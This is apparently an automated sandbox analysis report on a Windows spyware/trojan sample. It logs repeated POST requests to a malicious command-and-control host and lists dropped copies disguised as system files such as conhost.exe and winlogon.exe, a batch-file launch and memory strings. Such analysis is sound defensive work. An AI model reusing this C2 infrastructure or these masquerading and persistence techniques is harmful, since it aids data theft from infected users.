Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1756 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1032 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1756 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1720Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 306039cm.nyashcrack.top
                            Source: unknownHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D44D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.55.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003547000.00000004.00000800.00020000.00000000.sdmp, 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000001A.00000002.1893613908.00000218E5241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240914B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B1E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B912B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D51A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000037.00000003.2168596932.0000029C9D4F4000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.3275003437.00000280ACA4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3292176472.00000240A152A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000037.00000003.2168596932.0000029C9D456000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9B880D4C | 0_2_00007FFD9B880D4C
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9B880E43 | 0_2_00007FFD9B880E43
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9BC78F48 | 0_2_00007FFD9BC78F48
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9BC790F0 | 0_2_00007FFD9BC790F0
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Code function: 0_2_00007FFD9BC7B90D | 0_2_00007FFD9BC7B90D
Source: C:\Recovery\VTixufCejPQZEvXiB.exe | Code function: 48_2_00007FFD9B880D4C | 48_2_00007FFD9B880D4C
Source: C:\Recovery\VTixufCejPQZEvXiB.exe | Code function: 48_2_00007FFD9B889348 | 48_2_00007FFD9B889348
Source: C:\Recovery\VTixufCejPQZEvXiB.exe | Code function: 48_2_00007FFD9B889269 | 48_2_00007FFD9B889269
Source: C:\Recovery\VTixufCejPQZEvXiB.exe | Code function: 48_2_00007FFD9B8888DD | 48_2_00007FFD9B8888DD
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 49_2_00007FFD9B8B0D4C | 49_2_00007FFD9B8B0D4C
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 49_2_00007FFD9B8B0E43 | 49_2_00007FFD9B8B0E43
Source: C:\Users\Public\AccountPictures\winlogon.exe | Code function: 52_2_00007FFD9B870D4C | 52_2_00007FFD9B870D4C
Source: C:\Users\Public\AccountPictures\winlogon.exe | Code function: 52_2_00007FFD9B870E43 | 52_2_00007FFD9B870E43
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 53_2_00007FFD9B889348 | 53_2_00007FFD9B889348
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 53_2_00007FFD9B889269 | 53_2_00007FFD9B889269
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 53_2_00007FFD9B8888DD | 53_2_00007FFD9B8888DD
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 53_2_00007FFD9B880D4C | 53_2_00007FFD9B880D4C
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Code function: 53_2_00007FFD9B880E43 | 53_2_00007FFD9B880E43
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\JzShoUtR.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: 4si9noTBNw.exe, 00000000.00000002.1842455587.000000001C565000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 00000000.00000000.1668729661.0000000001138000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E33000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E70000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 00000029.00000002.2542272531.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 0000002A.00000002.2361041844.0000000003391000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe, 0000002A.00000002.2361041844.00000000033E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4si9noTBNw.exe
Source: 4si9noTBNw.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4si9noTBNw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VTixufCejPQZEvXiB.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VTixufCejPQZEvXiB.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VTixufCejPQZEvXiB.exe1.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: conhost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/77@1/2
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Program Files\Windows Defender\en-GB\conhost.exe
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\Desktop\nocldQFM.log
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8496:120:WilError_03
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File created: C:\Users\user\AppData\Local\Temp\2gwm2xp5
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
